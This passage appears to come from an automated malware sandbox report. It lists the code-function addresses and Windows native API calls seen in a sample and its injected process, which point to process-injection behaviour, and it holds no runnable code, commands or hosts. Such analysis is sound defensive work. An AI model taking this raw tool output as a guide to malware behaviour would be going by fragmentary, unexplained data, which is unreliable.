                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_038D2D30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_038D2CA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2C60 NtCreateKey,LdrInitializeThunk,8_2_038D2C60
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_038D2C70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D35C0 NtCreateMutant,LdrInitializeThunk,8_2_038D35C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D39B0 NtGetContextThread,LdrInitializeThunk,8_2_038D39B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2B80 NtQueryInformationFile,8_2_038D2B80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2AB0 NtWaitForSingleObject,8_2_038D2AB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2F90 NtProtectVirtualMemory,8_2_038D2F90
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2FA0 NtQuerySection,8_2_038D2FA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2F60 NtCreateProcessEx,8_2_038D2F60
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2EA0 NtAdjustPrivilegesToken,8_2_038D2EA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2E30 NtWriteVirtualMemory,8_2_038D2E30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2DB0 NtEnumerateKey,8_2_038D2DB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2D00 NtSetInformationFile,8_2_038D2D00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2CC0 NtQueryVirtualMemory,8_2_038D2CC0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2CF0 NtOpenProcess,8_2_038D2CF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2C00 NtQueryInformationProcess,8_2_038D2C00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D3090 NtSetValueKey,8_2_038D3090
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D3010 NtOpenDirectoryObject,8_2_038D3010
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D3D10 NtOpenProcessToken,8_2_038D3D10
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D3D70 NtOpenThread,8_2_038D3D70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B8BE0 NtDeleteFile,8_2_030B8BE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B8AF0 NtReadFile,8_2_030B8AF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B8980 NtCreateFile,8_2_030B8980
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B8DF0 NtAllocateVirtualMemory,8_2_030B8DF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B8C80 NtClose,8_2_030B8C80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0102D5BC0_2_0102D5BC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_053371700_2_05337170
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_053300060_2_05330006
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_053300400_2_05330040
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_053371630_2_05337163
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0755F2380_2_0755F238
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_075595880_2_07559588
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_075591500_2_07559150
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0755B1C00_2_0755B1C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0755B1B10_2_0755B1B1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_07550FD00_2_07550FD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_07550FC00_2_07550FC0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0755AD780_2_0755AD78
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0755AD880_2_0755AD88
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_004014203_2_00401420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_004010003_2_00401000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_004011543_2_00401154
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_004011603_2_00401160
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00416A4E3_2_00416A4E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00416A533_2_00416A53
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040FCCB3_2_0040FCCB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040FCD33_2_0040FCD3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0042E5233_2_0042E523
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040FEF33_2_0040FEF3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040DF733_2_0040DF73
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00402FD03_2_00402FD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D01AA3_2_019D01AA
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C41A23_2_019C41A2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C81CC3_2_019C81CC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AA1183_2_019AA118
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019001003_2_01900100
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019981583_2_01998158
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A20003_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E3F03_2_0191E3F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D03E63_2_019D03E6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA3523_2_019CA352
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019902C03_2_019902C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B02743_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D05913_2_019D0591
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019105353_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BE4F63_2_019BE4F6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B44203_2_019B4420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C24463_2_019C2446
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190C7C03_2_0190C7C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019347503_2_01934750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019107703_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192C6E03_2_0192C6E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A03_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019DA9A63_2_019DA9A6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019269623_2_01926962
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F68B83_2_018F68B8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E8F03_2_0193E8F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191A8403_2_0191A840
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019128403_2_01912840
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C6BD73_2_019C6BD7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CAB403_2_019CAB40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190EA803_2_0190EA80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01928DBF3_2_01928DBF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190ADE03_2_0190ADE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019ACD1F3_2_019ACD1F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191AD003_2_0191AD00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0CB53_2_019B0CB5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900CF23_2_01900CF2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910C003_2_01910C00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198EFA03_2_0198EFA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01902FC83_2_01902FC8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930F303_2_01930F30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B2F303_2_019B2F30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01952F283_2_01952F28
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01984F403_2_01984F40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01922E903_2_01922E90
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CCE933_2_019CCE93
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CEEDB3_2_019CEEDB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CEE263_2_019CEE26
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910E593_2_01910E59
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191B1B03_2_0191B1B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019DB16B3_2_019DB16B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194516C3_2_0194516C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FF1723_2_018FF172
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019170C03_2_019170C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BF0CC3_2_019BF0CC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C70E93_2_019C70E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF0E03_2_019CF0E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0195739A3_2_0195739A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C132D3_2_019C132D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FD34C3_2_018FD34C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019152A03_2_019152A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192B2C03_2_0192B2C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192D2F03_2_0192D2F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B12ED3_2_019B12ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AD5B03_2_019AD5B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D95C33_2_019D95C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C75713_2_019C7571
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF43F3_2_019CF43F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019014603_2_01901460
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF7B03_2_019CF7B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C16CC3_2_019C16CC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019556303_2_01955630
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A59103_2_019A5910
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019199503_2_01919950
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192B9503_2_0192B950
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019138E03_2_019138E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197D8003_2_0197D800
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192FB803_2_0192FB80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01985BF03_2_01985BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194DBF93_2_0194DBF9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFB763_2_019CFB76
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01955AA03_2_01955AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019ADAAC3_2_019ADAAC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B1AA33_2_019B1AA3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BDAC63_2_019BDAC6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFA493_2_019CFA49
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C7A463_2_019C7A46
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01983A6C3_2_01983A6C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192FDC03_2_0192FDC0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C1D5A3_2_019C1D5A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01913D403_2_01913D40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C7D733_2_019C7D73
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFCF23_2_019CFCF2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01989C323_2_01989C32
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01911F923_2_01911F92
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFFB13_2_019CFFB1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D3FD53_2_018D3FD5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D3FD23_2_018D3FD2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFF093_2_019CFF09
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01919EB03_2_01919EB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039603E68_2_039603E6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AE3F08_2_038AE3F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395A3528_2_0395A352
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039202C08_2_039202C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039402748_2_03940274
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039541A28_2_039541A2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039601AA8_2_039601AA
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039581CC8_2_039581CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038901008_2_03890100
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393A1188_2_0393A118
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039281588_2_03928158
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039320008_2_03932000
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389C7C08_2_0389C7C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038C47508_2_038C4750
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A07708_2_038A0770
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BC6E08_2_038BC6E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039605918_2_03960591
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A05358_2_038A0535
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394E4F68_2_0394E4F6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039444208_2_03944420
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039524468_2_03952446
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03956BD78_2_03956BD7
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395AB408_2_0395AB40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389EA808_2_0389EA80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A29A08_2_038A29A0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0396A9A68_2_0396A9A6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B69628_2_038B6962
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038868B88_2_038868B8
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038CE8F08_2_038CE8F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A28408_2_038A2840
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AA8408_2_038AA840
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0391EFA08_2_0391EFA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03892FC88_2_03892FC8
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03942F308_2_03942F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E2F288_2_038E2F28
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038C0F308_2_038C0F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03914F408_2_03914F40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395CE938_2_0395CE93
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B2E908_2_038B2E90
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395EEDB8_2_0395EEDB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395EE268_2_0395EE26
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A0E598_2_038A0E59
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B8DBF8_2_038B8DBF
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389ADE08_2_0389ADE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AAD008_2_038AAD00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393CD1F8_2_0393CD1F
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03940CB58_2_03940CB5
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03890CF28_2_03890CF2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A0C008_2_038A0C00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E739A8_2_038E739A
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395132D8_2_0395132D
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0388D34C8_2_0388D34C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A52A08_2_038A52A0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BB2C08_2_038BB2C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039412ED8_2_039412ED
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BD2F08_2_038BD2F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AB1B08_2_038AB1B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D516C8_2_038D516C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0388F1728_2_0388F172
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0396B16B8_2_0396B16B
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A70C08_2_038A70C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394F0CC8_2_0394F0CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F0E08_2_0395F0E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039570E98_2_039570E9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F7B08_2_0395F7B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039516CC8_2_039516CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E56308_2_038E5630
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393D5B08_2_0393D5B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039695C38_2_039695C3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039575718_2_03957571
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F43F8_2_0395F43F
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038914608_2_03891460
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BFB808_2_038BFB80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03915BF08_2_03915BF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038DDBF98_2_038DDBF9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FB768_2_0395FB76
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E5AA08_2_038E5AA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03941AA38_2_03941AA3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393DAAC8_2_0393DAAC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394DAC68_2_0394DAC6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03957A468_2_03957A46
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FA498_2_0395FA49
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03913A6C8_2_03913A6C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039359108_2_03935910
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A99508_2_038A9950
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BB9508_2_038BB950
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A38E08_2_038A38E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0390D8008_2_0390D800
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A1F928_2_038A1F92
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FFB18_2_0395FFB1
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03863FD58_2_03863FD5
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03863FD28_2_03863FD2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FF098_2_0395FF09
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A9EB08_2_038A9EB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BFDC08_2_038BFDC0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A3D408_2_038A3D40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03951D5A8_2_03951D5A
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03957D738_2_03957D73
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FCF28_2_0395FCF2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03919C328_2_03919C32
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A1B708_2_030A1B70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CA688_2_0309CA68
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CA708_2_0309CA70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309AD108_2_0309AD10
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CC908_2_0309CC90
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030BB2C08_2_030BB2C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A37EB8_2_030A37EB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A37F08_2_030A37F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE3548_2_03BBE354
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE4738_2_03BBE473
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE80C8_2_03BBE80C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBD8788_2_03BBD878
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: String function: 018FB970 appears 262 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: String function: 01945130 appears 58 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: String function: 0198F290 appears 103 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: String function: 0197EA12 appears 86 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: String function: 01957E54 appears 107 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: String function: 0390EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: String function: 0391F290 appears 103 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: String function: 038D5130 appears 58 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: String function: 0388B970 appears 262 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: String function: 038E7E54 appears 107 times
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1758679977.00000000075A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs dGHiTqj3AB.exe
